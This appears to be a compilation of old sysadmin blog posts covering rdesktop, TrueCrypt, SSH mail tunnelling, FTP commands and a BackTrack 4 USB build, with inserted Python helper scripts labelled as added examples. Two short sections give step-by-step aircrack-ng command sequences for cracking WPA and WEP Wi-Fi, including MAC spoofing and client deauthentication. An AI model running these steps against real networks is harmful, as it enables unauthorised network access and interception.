
Using Remote Desktop for Linux with rdesktop

The rdesktop client can be used to connect to Windows Terminal Services over the Remote Desktop Protocol (RDP) from Linux machines. It supports all versions of Microsoft Windows including the latest, Windows Server 2008 and Windows 7, and it runs on most Unix-based platforms as well as other ports.

Visit http://sourceforge.net/projects/rdesktop/ for more information or to download rdesktop.

Download and Install:

  1. wget http://garr.dl.sourceforge.net/sourceforge/rdesktop/rdesktop-1.6.0.tar.gz
  2. tar -zxf rdesktop-1.6.0.tar.gz
  3. cd rdesktop-1.6.0
  4. ./configure
  5. make
  6. make install

Basic Usage:

rdesktop -k en-us -a 16 -f -u <username> -p <password> <server>

Command Options Used:

-f switch for full screen mode
-k for keyboard layout on server
-a for color depth
-u for username
-p for password (use - to be prompted instead)

Note: To exit full screen mode press: CTRL + ALT + Enter

Full Usage Options

Usage: rdesktop [options] server[:port]
-u: user name
-d: domain
-s: shell
-c: working directory
-p: password (- to prompt)
-n: client hostname
-k: keyboard layout on server (en-us, de, sv, etc.)
-g: desktop geometry (WxH)
-f: full-screen mode
-b: force bitmap updates
-L: local codepage
-A: enable SeamlessRDP mode
-B: use BackingStore of X-server (if available)
-e: disable encryption (French TS)
-E: disable encryption from client to server
-m: do not send motion events
-C: use private colour map
-D: hide window manager decorations
-K: keep window manager key bindings
-S: caption button size (single application mode)
-T: window title
-N: enable numlock syncronization
-X: embed into another window with a given id.
-a: connection colour depth
-z: enable rdp compression
-x: RDP5 experience (m[odem 28.8], b[roadband], l[an] or hex nr.)
-P: use persistent bitmap caching
-0: attach to console
-4: use RDP version 4
-5: use RDP version 5 (default)

There is also a graphical user interface (GUI) that you can use, named Terminal Server Client [tsclient].
Visit: http://sourceforge.net/projects/tsclient for more information and to download tsclient.


HowTo: Crack WPA with Backtrack 3

This is an easy-to-follow tutorial on how to crack a WPA-encrypted password. This information should only be used for educational purposes.

Steps:

  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger --mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
  7. aireplay-ng -0 5 -a (bssid) wlan0
  8. aircrack-ng (filename-01.cap) -w (dictionary location)


HowTo: Crack WEP with BackTrack 3

This is a tutorial on how to crack a WEP-encrypted password. This information should only be used for educational purposes.

Steps:

  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger --mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
  7. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
  8. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  9. aircrack-ng -b (bssid) (filename-01.cap)


TrueCrypt – Free Open Source Industrial Strength Encryption

TrueCrypt provides a solution for encrypting sensitive data – everything from portable, mountable volumes to entire hard disks. Encrypting your data renders it useless to anyone without the pass phrase, even if your computer or your thumbdrive falls into the wrong hands.

And TrueCrypt makes it not only easy, but nearly un-crackable.  TrueCrypt is both open source and FREE.

There are two approaches to using TrueCrypt:

  • Whole Drive Encryption – you can use TrueCrypt to encrypt your entire hard disk, including your boot partition. In order to boot the machine, you must first supply your pass phrase to enable decryption. Once booted, data is automatically and transparently encrypted and decrypted as it travels to and from the disk. Once your machine is turned off, the data is unrecoverable without knowing the pass phrase.
  • Container Encryption – with this approach you create a single file on your computer’s hard drive that is encrypted. You then “mount” that file using TrueCrypt, supplying the correct pass phrase to decrypt it after which the contents of that file appear as another drive on your system. Reading from and writing to that “drive” automatically and transparently decrypts and encrypts the data. Once the drive is unmounted, the data is once again unrecoverable without knowing the pass phrase.

TrueCrypt is both simple and elegant.

Most users prefer container based encryption for its portability, and for the fact that you need only mount the encrypted drive when you need access. You could keep personal information in a TrueCrypt container that could be regularly copied between machines, onto a thumbdrive, and even backed up to the Internet. When you need to access the encrypted data, simply mount it, specify your pass phrase to unlock it, and use the files that are stored within it.

TrueCrypt is not tied to any one platform, your user account or anything else; just the pass phrase. In fact, you can copy your encrypted file to another machine entirely and mount it with TrueCrypt, even under another operating system such as Mac or Linux.

Here are a couple of important caveats:

  • Encryption does not make a bad pass phrase any more secure. If you choose an obvious pass phrase, an attack can certainly be mounted that could unlock your encrypted volume. This is why we talk about pass phrase instead of password. Use a multi-word phrase that you can remember to be the key to your encrypted data, and it’ll be much, much more difficult to break.
  • An encrypted volume does you no good if the files you care about are also elsewhere on your machine.
  • Make sure you have secure backups, updated regularly. Preferably keep them UNencrypted, but secure in some other way, in case you lose your encrypted volume or forget your pass phrase. If you’ve chosen a good passphrase, without it the data is not recoverable.

TrueCrypt is FREE open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux

TrueCrypt Features:

Data encryption is an important part of an overall security strategy. TrueCrypt can be a key part of that strategy.

Download TrueCrypt.


32 FREE Windows Administration Utilities

  1. BareTail. A free real-time log file monitoring tool.
  2. CamStudio. Free screen recording software.
  3. CDBurnerXP. Burns CD-ROMs, DVDs, audio CDs, and ISO images.
  4. Comodo Firewall Pro. A firewall and antivirus application.
  5. DriveImage XML. A program for imaging and backing up partitions and logical drives.
  6. FileZilla. GUI FTP client.
  7. GParted LiveCD. Manages partitions on systems.
  8. InfraRecorder. Burns ISO images and creates data and audio CDs and DVDs.
  9. Lansweeper. A network inventory tool that performs hardware scanning, software scanning, and Active Directory (AD) reporting.
  10. LocatePC. Emails you whenever any private or public IP address in your system changes – great for tracking a stolen computer.
  11. MyDefrag (formerly JkDefrag). Defragments and optimizes disks.
  12. Nessus (formerly NeWT). Network/computer vulnerability scanner.
  13. Ngrep. A packet sniffer that matches packet payloads against text patterns.
  14. Notepad++. A text and code editor.
  15. NTFS Undelete. Recovers deleted files that are no longer in the recycle bin.
  16. Open Computers and Software Inventory (OCS Inventory NG). Provides detailed inventory data for an entire network of computers and deploys packages.
  17. OpenSSH. Creates secure, encrypted shell sessions.
  18. PageDefrag. Determines how fragmented your paging files and registry hives are, and defragments them.
  19. Paint.NET. Free image and photo editing software for Windows.
  20. PING (Partimage Is Not Ghost). Backs up and restores disk partitions.
  21. PRTG Traffic Grapher. A powerful network monitor.
  22. System Information for Windows (SIW). Gathers detailed information about a computer's system properties, settings, and displays.
  23. TestDisk. Recovers damaged partitions, makes non-bootable disks bootable again, and repairs damaged boot sectors.
  24. TrueCrypt. Free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux.
  25. WinDirStat. Determines how space is being used across disks and visually represents the results in multiple ways.
  26. WinPE (Windows Preinstallation Environment). Lets you make a Windows command-line boot recovery DVD.
  27. WinDump. The Windows version of tcpdump, the command-line network analyzer for UNIX / Linux.
  28. Winfingerprint. A network scanner.
  29. Wink. Builds screencast recordings.
  30. WireShark (formerly Ethereal). Network protocol analyzer.
  31. XML Notepad. A specialized XML editor.
  32. ZoomIt. Magnifies portions of a screen and lets you draw on and annotate the screen.

How to keep your email safe from sniffing

Every time you use public internet facilities and hotspots you may be at risk: others within range can "sniff", or listen in to, the wireless network traffic and from it determine the account names, servers and passwords of anyone who happens to check email while the "hacker" is looking.

The simplest solution is to use webmail, making sure that it’s on an “https”, secure, connection. This ensures the data is encrypted and safe from any sniffers that happen to see it.

But for many of us, that’s not as optimal as we’d like. We’d like to keep using our regular email program and POP3/IMAP/SMTP servers.

Enter “SSH Tunneling”.

Now, one of the requirements for SSH tunneling is that you have SSH (Secure SHell) access to your mail server. If you do not (and if you don’t know, you probably don’t), you can stop reading now. Check with your ISP if you like, to see if you can get it, but this technique relies on SSH being available on your server.

The good news is that once you have SSH access, there’s no further server-side configuration.

The technique works like this:

  • Using your SSH client or other tools, set up a “tunnel” for ports 25 and 110 on your machine to those same ports on your mail server. This does require that the client or tool be kept running.
  • Configure your mail client to send to and fetch from “localhost” instead of your mail server.

That’s really all there is to it.

Let’s walk through the details for Windows users.

Start by getting PuTTY. Get the ZIP file that contains all the tools, because we’ll be using more than just the PuTTY client.

One of the tools is called “plink”. In a command shell, run the following:

plink -v -L 110:mailserver:110 -L 25:mailserver:25 -2 you@mailserver -N -pw yourpassword

Where:

  • -v: verbose. Optional, but it shows you what plink is doing while it sets up the tunnel and for as long as the tunnel is active.
  • -L 110:mailserver:110: defines a tunnel from port 110 on your local machine to port 110 on the mail server. Port 110 is the POP3 mail service. Replace "mailserver" with the name of your POP3 server.
  • -L 25:mailserver:25: defines a tunnel from port 25 on your local machine to port 25 on the mail server. Port 25 is the outgoing SMTP mail port. Again, replace "mailserver" with the name of your SMTP server.
  • -2: force the SSH version 2 protocol only. Optional, but slightly more secure. Use it unless your remote server doesn't support it.
  • you@mailserver: your SSH login account name @ your mail server.
  • -N: no shell. Normally plink also opens an interactive shell; for our purposes here we don't need one.
  • -pw yourpassword: the password for your SSH login account. You can also leave this off to be prompted instead.

Leave plink running once it connects.

Now, in your email client (Outlook, Eudora, whatever), change both the POP3 and SMTP servers to “localhost”.

Here's what happens now: when you reload your email client, it will attempt to, for example, fetch POP3 mail from "localhost, port 110". Plink is listening on port 110 on your local machine; it encrypts the data and sends it to the SSH server running on the mail server. There, the SSH server decrypts the data and forwards it on to port 110 on the mail server. Data coming back is handled similarly, as is the SMTP port 25 conversation we defined as well.
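Before typing a plink line like the one above, it is worth checking what it will actually open. The script below is an added example, not part of the original post or of PuTTY: it parses a plink/OpenSSH-style command line, lists the -L forwards it defines, and reports the points the post raises (password on the command line, -2, -N) plus one it does not, a forward bound to a non-loopback address. The option list and port names are assumptions made for the example.

```python
"""Audit a plink-style tunnel command line before running it (added example)."""
import shlex

# Options that consume the following argument (plink and OpenSSH share these).
TAKES_VALUE = {"-L", "-R", "-D", "-pw", "-P", "-l", "-i", "-m"}
LOOPBACK = {"localhost", "127.0.0.1", "::1"}
PORT_NAMES = {25: "SMTP", 110: "POP3", 143: "IMAP", 3306: "MySQL"}

# The command line from the post, used when the script is run without arguments.
EXAMPLE = ("plink -v -L 110:mailserver:110 -L 25:mailserver:25 -2 "
           "you@mailserver -N -pw yourpassword")


def parse_forward(spec):
    """Parse one -L spec: 'lport:host:rport' or 'bindaddr:lport:host:rport'.

    Returns (bind_addr, local_port, remote_host, remote_port). With no bind
    address given, plink and ssh listen on the loopback interface only.
    """
    parts = spec.split(":")
    if len(parts) == 3:
        parts = ["localhost"] + parts
    if len(parts) != 4:
        raise ValueError("malformed -L spec: %r" % spec)
    bind_addr, lport, host, rport = parts
    return bind_addr, int(lport), host, int(rport)


def audit_tunnel_command(cmdline):
    """Return the forwards the command sets up plus a list of findings."""
    argv = shlex.split(cmdline)
    result = {"forwards": [], "login": None, "password_on_cmdline": False,
              "ssh2_only": False, "no_shell": False, "findings": []}
    i = 1  # argv[0] is plink/ssh itself
    while i < len(argv):
        arg = argv[i]
        if arg in TAKES_VALUE:
            value = argv[i + 1] if i + 1 < len(argv) else ""
            if arg == "-L":
                result["forwards"].append(parse_forward(value))
            elif arg == "-pw":
                result["password_on_cmdline"] = True
            i += 2
            continue
        if arg == "-2":
            result["ssh2_only"] = True
        elif arg == "-N":
            result["no_shell"] = True
        elif not arg.startswith("-") and "@" in arg:
            result["login"] = arg  # user@host token
        i += 1

    findings = result["findings"]
    if result["password_on_cmdline"]:
        findings.append("-pw puts the SSH password on the command line, where "
                        "process listings and shell history expose it; omit it "
                        "and let plink prompt")
    if not result["ssh2_only"]:
        findings.append("-2 not given: client may negotiate SSH protocol 1")
    if not result["no_shell"]:
        findings.append("-N not given: an interactive shell opens alongside the tunnel")
    if not result["forwards"]:
        findings.append("no -L forwards defined; nothing will be tunnelled")
    for bind_addr, lport, host, rport in result["forwards"]:
        service = PORT_NAMES.get(rport, "port %d" % rport)
        if bind_addr not in LOOPBACK:
            findings.append("%s forward listens on %s:%d, so other hosts on the "
                            "network can reach it" % (service, bind_addr, lport))
    return result


if __name__ == "__main__":
    import json
    import sys
    print(json.dumps(audit_tunnel_command(" ".join(sys.argv[1:]) or EXAMPLE), indent=2))
```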

A couple of additional notes…

You can tunnel other protocols (like MySQL, IMAP, etc.) by adding "-L port:server:port" parameters to the plink line.

You can perform the port forwarding in PuTTY itself, the interactive client if you like – there is a section in the options for that, and it can be saved with the profile for that connection.

Remember that while your email is configured to use “localhost” as the mail server, the tunnel must be running (the plink command must be active). If it is not, email will fail.

This is yet another use for the great FREE utility PuTTY.


Internet Safety: How to keep your computer safe on the Internet

Here are some things you can, and should, do to stay safe.

  • Stay Up-To-Date – Most virus infections don’t have to happen. Software vulnerabilities that the viruses exploit usually already have patches available by the time the virus reaches a computer. The problem? The user simply failed to install the latest patches and updates that would have prevented the infection in the first place. The solution is simple: enable automatic updates, and visit Windows Update periodically. Keeping Windows and other software up-to-date is the most important (and easiest) thing you can do to protect your computer.
  • Get Educated – To be blunt, all the protection in the world won’t save you from yourself. Don’t open attachments that you aren’t positive are okay. Don’t fall for phishing scams. Don’t click on links in email that you aren’t positive are safe. Don’t install “free” software without checking it out first – many “free” packages are free because they come loaded with spyware, adware and worse. When visiting a web site, did you get a pop-up asking if it’s ok to install some software you’re not sure of because you’ve never heard of it? Don’t say “OK”. Not sure about some security warning you’ve been given? Don’t ignore it. Choose strong passwords, and don’t share them with others.
  • Use a Firewall – A firewall is a piece of software or hardware that sits between your computer and the Internet and only allows certain types of traffic to cross. For example, a firewall may allow checking email and browsing the web, but disallow things that are commonly not as useful such as RPC or "Remote Procedure Calls".
  • Virus Scan – Sometimes, typically via email, viruses are able to cross the firewall and get to your computer anyway. A virus scanner will locate and remove them from your hard disk. A real-time virus scanner will notice them as they arrive, even before they hit the disk, but at the cost of slowing down your machine a little. Important: because new viruses are arriving every day, it's important to keep your virus definitions up-to-date. Be sure to enable the scanning software's automatic-update feature and have it do so every day.
  • Kill Spyware – Spyware is similar to viruses in that it arrives unexpected and unannounced and proceeds to do something undesired. Normally spyware is relatively benign from a safety perspective, but it can violate your privacy by tracking the web sites you visit, or add "features" to your system that you didn't ask for. The worst offenders are spyware that hijack normal functions for themselves. For example, some like to redirect your web searches to other sites to try and sell you something. Of course some spyware is so poorly written that it might as well be a virus, given how unstable it can make your system. The good news is that, like virus scanners, there are spyware scanners that will locate and remove the offending software.
  • Secure Your Mobile Connection – if you’re traveling and using internet hot spots, free Wifi or internet cafes, you must take extra precautions. Make sure that your web email access is via secure (https) connections, or that your regular mail is over an encrypted connection as well. Don’t let people “shoulder surf” and steal your password by watching you type it in a public place. Make sure your home Wifi has WEP or, preferably WPA security enabled if anyone can drive or walk within range.
  • Don’t forget the physical – an old computer adage is that “if it’s not physically secure, it’s not secure.” All of the precautions I’ve listed above are pointless if other people can get at your computer. They may not follow the safety rules I’ve laid out. A thief can easily get at all the unencrypted data on your computer if they can physically get to it. The common scenario is a laptop being stolen, but there are many reports of people who’ve been burned because a family member or roommate accessed their computer without their knowledge. 

It all might seem overwhelming, but it’s not nearly as overwhelming as an actual security problem if and when it happens to you. While we might want it to be otherwise, the practical reality of the internet, and computing today, is that we each must take responsibility for our own security online.


FTP – File Transfer Protocol

FTP

File Transfer Protocol

Syntax
FTP [-options] [-s:filename] [-w:buffer] [host]

key
-s:filename Run a text file containing FTP commands.

host Host name or IP address of the remote host.

-g Disable filename wildcards.

-n No auto-login.

-i No interactive prompts during ftp.

-v Hide remote server responses.

-w:buffer Set buffer size to buffer (default=4096)

-d Debug

-a Use any local interface when binding data connection.


Commands to run at the FTP: prompt

append local-file [remote-file]
Append a local file to a file on the remote computer.

ascii Set the file transfer type to ASCII, the default.
In ASCII text mode, character-set and end-of-line
characters are converted as necessary.

bell Toggle a bell to ring after each command.
By default, the bell is off.

binary Set the file transfer type to binary.
Use `Binary' for transferring executable program
files or binary data files e.g. Oracle

bye End the FTP session and exit ftp

cd Change the working directory on the remote host.

close End the FTP session and return to the cmd prompt.

debug Toggle debugging. When debug is on, FTP will display
every command.

delete remote-file
Delete file on remote host.

dir [remote-directory] [local-file]
List a remote directory's files and subdirectories.
(or save the listing to local-file)

disconnect Disconnect from the remote host, retaining the ftp prompt.

get remote-file [local-file]
Copy a remote file to the local PC.

glob Toggle the use of wildcard characters in local pathnames.
By default, globbing is on.

hash Toggle printing a hash (#) for each 2K data block transferred.
By default, hash mark printing is off.

help [command]
Display help for ftp command.

lcd [directory]
Change the working directory on the local PC.
By default, the working directory is the directory in which ftp was started.

literal argument [ ...]
Send arguments, as-is, to the remote FTP host.

ls [remote-directory] [local-file]
List a remote directory's files and folders.
(short format)

mdelete remote-files [ ...]
Delete files on remote host.

mdir remote-files [ ...] local-file
Display a list of a remote directory's files and subdirectories.
(or save the listing to local-file)
Mdir allows you to specify multiple files.

mget remote-files [ ...]
Copy multiple remote files to the local PC.

mkdir directory
Create a directory on the remote host.

mls remote-files [ ...] local-file
List a remote directory's files and folders.
(short format)

mput local-files [ ...]
Copy multiple local files to the remote host.

open computer [port]
Connects to the specified FTP server.

prompt Toggle prompting. Ftp prompts during multiple file transfers to
allow you to selectively retrieve or store files;
mget and mput transfer all files if prompting is turned off.
By default, prompting is on.

put local-file [remote-file]
Copy a local file to the remote host.

pwd Print Working Directory
(current directory on the remote host)

quit End the FTP session with the remote host and exit ftp.

quote argument [ ...]
Send arguments, as-is, to the remote FTP host.

recv remote-file [local-file]
Copy a remote file to the local PC.

remotehelp [command]
Display help for remote commands.

rename filename newfilename
Rename remote files.

rmdir directory
Delete a remote directory.

send local-file [remote-file]
Copy a local file to the remote host.

status Display the current status of FTP connections and toggles.

trace Toggles packet tracing; trace displays the route of each packet

type [type-name]
Set or display the file transfer type:
`binary' or `ASCII' (the default)

If type-name is not specified, the current type is displayed.
ASCII should be used when transferring text files.

In ASCII text mode, character-set and end-of-line
characters are converted as necessary.

Use `Binary' for transferring executable files.

user user-name [password] [account]
Specifies a user to the remote host.

verbose Toggle verbose mode. By default, verbose is on.

! command Run command on the local PC.

? [command] Display help for ftp command.

Examples
an example FTP Script to retrieve files in binary and then ascii mode:

::GetFiles.ftp

[User_id]
[ftp_password]
binary
get /usr/file1.exe
get file2.html
mget *.jpeg
ascii
mget *.txt
quit

To run the above script:
FTP -s:GetFiles.ftp [hostname]
This will connect as the user:User_id with password:ftp_password

An FTP Script to publish files in binary mode:

::PutFiles.ftp

[User_id]
[ftp_password]
binary
mput *.html
cd images
mput *.gif
quit

To run the above script:
FTP -s:PutFiles.ftp [hostname]
This will connect as the user:User_id with password:ftp_password


Using the Windows GUI for FTP
Windows Explorer (not Internet Explorer) also has a built in FTP client.
Type in the address bar:

ftp://username@ftpserver.address.com

you will be prompted for the password.
You can also use

ftp://username:password@ftpserver.address.com

This is not recommended as anyone can read the password.

Secure FTP
Standard FTP does not encrypt passwords – they are sent across the network in plain text. A more secure method is to use SFTP (SSH File Transfer Protocol) or SCP (Secure Copy). Freeware clients such as WinSCP are available.
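To see why the plain-text warning matters, here is an added example (not from the original page) of the detection logic a network monitor could run over captured FTP control-channel lines and proxy logs: it flags USER/PASS logins and ftp://user:password@host URLs of the kind shown above, recording who logged in and how long the password was but never the password itself. The capture is constructed for the example and mirrors the GetFiles.ftp script.

```python
"""Flag cleartext FTP logins in captured control-channel traffic (added example)."""
import re

# ftp://user:password@host URLs, the form Explorer's address bar accepts.
URL_CREDS = re.compile(r"ftp://([^:/@\s]+):([^@\s]+)@([^/\s]+)", re.IGNORECASE)

# Constructed sample: the control channel of the GetFiles.ftp script above,
# as a sniffer on the path would see it (client and server lines interleaved).
SAMPLE_CAPTURE = [
    "220 ftpserver.address.com FTP server ready",
    "USER User_id",
    "331 Password required for User_id",
    "PASS ftp_password",
    "230 User User_id logged in",
    "TYPE I",
    "RETR /usr/file1.exe",
    "226 Transfer complete",
]


def find_ftp_logins(lines):
    """Return one alert per USER/PASS pair seen on the wire.

    Server replies (three-digit codes) are ignored. The alert records who
    logged in and how long the password was, never the password itself, so
    the detection log does not become a second copy of the secret.
    """
    alerts, pending_user = [], None
    for lineno, raw in enumerate(lines, 1):
        verb, _, arg = raw.strip().partition(" ")
        if verb[:3].isdigit():  # server reply, not a client command
            continue
        verb = verb.upper()
        if verb == "USER":
            pending_user = (arg.strip(), lineno)
        elif verb == "PASS":
            user, user_line = pending_user or ("<unknown>", None)
            alerts.append({"user": user, "user_line": user_line,
                           "pass_line": lineno,
                           "password_length": len(arg.strip())})
            pending_user = None
    return alerts


def find_url_credentials(text):
    """Return (user, host) for every ftp://user:password@host URL in text,
    e.g. a proxy log; the password group is deliberately dropped."""
    return [(m.group(1), m.group(3)) for m in URL_CREDS.finditer(text)]


if __name__ == "__main__":
    for alert in find_ftp_logins(SAMPLE_CAPTURE):
        print("cleartext FTP login: user=%(user)s (lines %(user_line)s/%(pass_line)s, "
              "%(password_length)d-char password)" % alert)
```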


Backtrack 4 – USB/Nessus Boot with Persistent Changes

This how-to will show you a method for building a USB thumb drive with the following features:
  • Persistent Changes – Files saved and changes made will be kept across reboots.
  • Nessus and NessusClient installed – Everybody needs Nessus
  • Encryption configured (Note: This is not whole drive encryption)

Tools and Supplies

  1. A USB thumbdrive – minimum capacity 4GB
  2. A Backtrack 3 CDROM, Backtrack 4 DVD or an additional USB thumbdrive (minimum 2GB) – Used to partition the thumbdrive.
  3. Optional: UNetbootin – A tool to transfer an iso image to a USB drive.
Download the Backtrack 4 Pre Release ISO here.
This tutorial is based on booting Backtrack 4 first. This means that you need some form of bootable Backtrack 4 media. This can be a virtual machine, DVD, or USB drive. Use your favorite method of creating a DVD or USB drive or you can use UNetBootin to create the thumb drive.  Below is a screenshot of using UnetBootin to install Backtrack 4 on a USB drive.
Installing Backtrack 4 with UnetBootin
It is as simple as selecting the image we want to write to the USB drive, the drive to write it to, and then clicking the ‘OK’ button. Warning: Make sure you pick the correct destination drive.
Partition the USB thumbdrive
The first step is to boot up Backtrack 4.  With the release of Backtrack 4 Final, a 4 GB drive is required if we are going to enable persistence.  For Backtrack 3 and Backtrack 4 Beta, we could get away with a 2GB drive.  We will also need to figure out which drive is our target drive. The following command will show the drives available and you can determine from that which is the new USB drive:
dmesg | egrep 'hd.|sd.'
We need to partition and format the drive as follows:
  1. The first partition needs to be a primary partition of at least 1.5 GB and set to type vfat. Also remember to make this partition active when you are creating it. Otherwise you might have some boot problems.
  2. The second Partition can be the rest of the thumb drive.
Below are the steps to take to get the drive partitioned and formatted. These steps are taken from this video on the Offensive Security website. A '# blah blah' indicates a comment and is not part of the command; user-typed commands are bolded. One note: we will need to delete any existing partitions on the drive.

fdisk /dev/sda # use the appropriate drive letter for your system
# delete existing partitions. There may be more than one.
Command (m for help): d
Partition number (1-4): 1
# create the first partition
Command (m for help): n
Command action
e   extended
p   primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-522, default 1):
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-522, default 522): +1500M
#create the second partition
Command (m for help): n
Command action
e   extended
p   primary partition (1-4)
p
Partition number (1-4): 2
First cylinder (193-522, default 193):
Using default value 193
Last cylinder, +cylinders or +size{K,M,G} (193-522, default 522):
Using default value 522
# Setting the partition type for the first partition to vfat/fat32
Command (m for help): t
Partition number (1-4): 1
Hex code (type L to list codes): b
Changed system type of partition 1 to b (W95 FAT32)
# Setting the partition type for the second partition to Linux
Command (m for help): t
Partition number (1-4): 2
Hex code (type L to list codes): 83
# Setting the first partition active
Command (m for help): a
Partition number (1-4): 1
Command (m for help): w
# now it is time to format the partitions (same drive as above, sda in this example)
mkfs.vfat /dev/sda1
mkfs.ext3 -b 4096 -L casper-rw /dev/sda2

Two things to notice in the format commands above: 1) we are using ext3 instead of ext2, and 2) you must include the -L casper-rw portion of the command. Being able to use ext3 is great because of journaling. The -L casper-rw label gets around the earlier problem of having to enter the partition name to get persistence working; as you will see, that is no longer necessary. So go ahead and partition and format the drive according to the layout above.
Make it a bootable Backtrack 4 USB thumb drive
  1. Mount the first partition.
  2. Copy the Backtrack files to it.
  3. Install grub.

Following are the commands to execute. Again, '#' denotes a comment and user-typed commands are in bold.

# mount the first partition, sda1 in my case.
mkdir /mnt/sda1
mount /dev/sda1 /mnt/sda1

# copy the files, you will need to find where the ISO is mounted on your system.
cd /mnt/sda1
rsync -r /media/cdrom0/* .

# install grub
grub-install --no-floppy --root-directory=/mnt/sda1 /dev/sda

That’s it. We now have a bootable Backtrack 4 USB thumb drive.
Persistent Changes
This is done much differently and more easily than it was in Backtrack 4 Beta or Backtrack 3. First of all, for basic persistence, we don't have to do anything at all. There is already a menu option that takes care of it for us. Unfortunately, it is only for console mode, so we need to make a couple of changes. We want to do the following things:
  1. Change the default boot selection to persistent.
  2. Set the resolution for our gui.

To do so, do the following. Again, '#' denotes a comment and the rest are user-typed commands.

cd /mnt/sda1/boot/grub
vi menu.lst

# change the default line below to 'default 4' and append 'vga=0x317' (that's a zero) to the kernel line to set the resolution to 1024x768
# By default, boot the first entry.
default 4
.
.
.
title                Start Persistent Live CD
kernel           /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet vga=0x317
initrd            /boot/initrd.gz

:wq

Here is my entire menu.lst file for reference.

# By default, boot the first entry.
default 4
# Boot automatically after 30 secs.
timeout 30

splashimage=/boot/grub/bt4.xpm.gz
title                Start BackTrack FrameBuffer (1024×768)
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x317
initrd                /boot/initrd.gz
title                Start BackTrack FrameBuffer (800×600)
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x314
initrd                /boot/initrd800.gz
title                Start BackTrack Forensics (no swap)
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent rw vga=0x317
initrd                /boot/initrdfr.gz
title                Start BackTrack in Safe Graphical Mode
kernel                /boot/vmlinuz BOOT=casper boot=casper xforcevesa rw quiet
initrd                /boot/initrd.gz

title                Start Persistent Live CD
kernel                /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet vga=0x317
initrd                /boot/initrd.gz
title                Start BackTrack in Text Mode
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent textonly rw quiet
initrd                /boot/initrd.gz
title                Start BackTrack Graphical Mode from RAM
kernel                /boot/vmlinuz BOOT=casper boot=casper toram nopersistent rw quiet
initrd                /boot/initrd.gz
title                Memory Test
kernel                /boot/memtest86+.bin
title                Boot the First Hard Disk
root                (hd0)
chainloader +1

Reboot and either select “Start Persistent Live CD” or just wait since we set it to auto-boot to persistent mode. To test it, create a file and reboot again. If your file is still there, everything is golden.
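The 'default 4' above is only right because "Start Persistent Live CD" happens to be the fifth title stanza in this menu.lst (GRUB legacy numbers stanzas from 0). The following script is an added example, not from the original how-to: it computes that index from the stanza order, sets the default accordingly and appends vga=0x317 to the persistent entry's kernel line, so the edit does not go wrong if entries are added or reordered. The embedded menu.lst is a constructed copy of the stock file before the edit.

```python
"""Point a BackTrack 4 grub menu.lst at the persistent entry (added example)."""
import re

PERSISTENT_TITLE = "Start Persistent Live CD"
VGA_MODE = "vga=0x317"  # 1024x768 framebuffer, as in the how-to

# Constructed copy of the stock menu.lst before the edit: default 0 and no
# vga= mode on the persistent entry. Titles are the ones from the how-to.
MENU_LST = """\
# By default, boot the first entry.
default 0
# Boot automatically after 30 secs.
timeout 30

splashimage=/boot/grub/bt4.xpm.gz
title                Start BackTrack FrameBuffer (1024x768)
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x317
initrd                /boot/initrd.gz
title                Start BackTrack FrameBuffer (800x600)
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x314
initrd                /boot/initrd800.gz
title                Start BackTrack Forensics (no swap)
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent rw vga=0x317
initrd                /boot/initrdfr.gz
title                Start BackTrack in Safe Graphical Mode
kernel                /boot/vmlinuz BOOT=casper boot=casper xforcevesa rw quiet
initrd                /boot/initrd.gz
title                Start Persistent Live CD
kernel                /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet
initrd                /boot/initrd.gz
title                Start BackTrack in Text Mode
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent textonly rw quiet
initrd                /boot/initrd.gz
"""


def list_entries(menu_text):
    """Return [(index, title), ...]; GRUB legacy numbers title stanzas from 0."""
    titles = [l[len("title"):].strip() for l in menu_text.splitlines()
              if l.startswith("title")]
    return list(enumerate(titles))


def set_persistent_default(menu_text, title=PERSISTENT_TITLE, vga=VGA_MODE):
    """Return (new_text, entry_index) with 'default' pointing at the entry
    called `title` and `vga` on that entry's kernel line.

    The index is computed from stanza order instead of being typed in by hand,
    so the edit stays correct if entries are added above the persistent one.
    Safe to run twice: an existing vga= mode on the line is replaced.
    """
    lines = menu_text.splitlines()
    title_at = [i for i, l in enumerate(lines) if l.startswith("title")]
    target = None
    for index, i in enumerate(title_at):
        if lines[i][len("title"):].strip() == title:
            target = index
            break
    if target is None:
        raise ValueError("no menu entry titled %r" % title)
    # The stanza runs from its title line up to the next title (or EOF).
    start = title_at[target]
    end = title_at[target + 1] if target + 1 < len(title_at) else len(lines)
    for j in range(start, end):
        if lines[j].startswith("kernel"):
            lines[j] = re.sub(r"\s*vga=\S+", "", lines[j]).rstrip() + " " + vga
    # Rewrite the existing 'default N' line, or add one at the top.
    for j, l in enumerate(lines):
        if re.match(r"default(\s|$)", l):
            lines[j] = "default %d" % target
            break
    else:
        lines.insert(0, "default %d" % target)
    return "\n".join(lines) + "\n", target


if __name__ == "__main__":
    new_text, index = set_persistent_default(MENU_LST)
    print("persistent entry is index %d" % index)
    print(new_text)
```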
Install Nessus
Download the Ubuntu Nessus and NessusClient packages from nessus.org. The 32-bit 8.10 version worked fine for me. Again, with Backtrack 4 things are a little easier. To install the Nessus server, simply execute the following command to install the package.

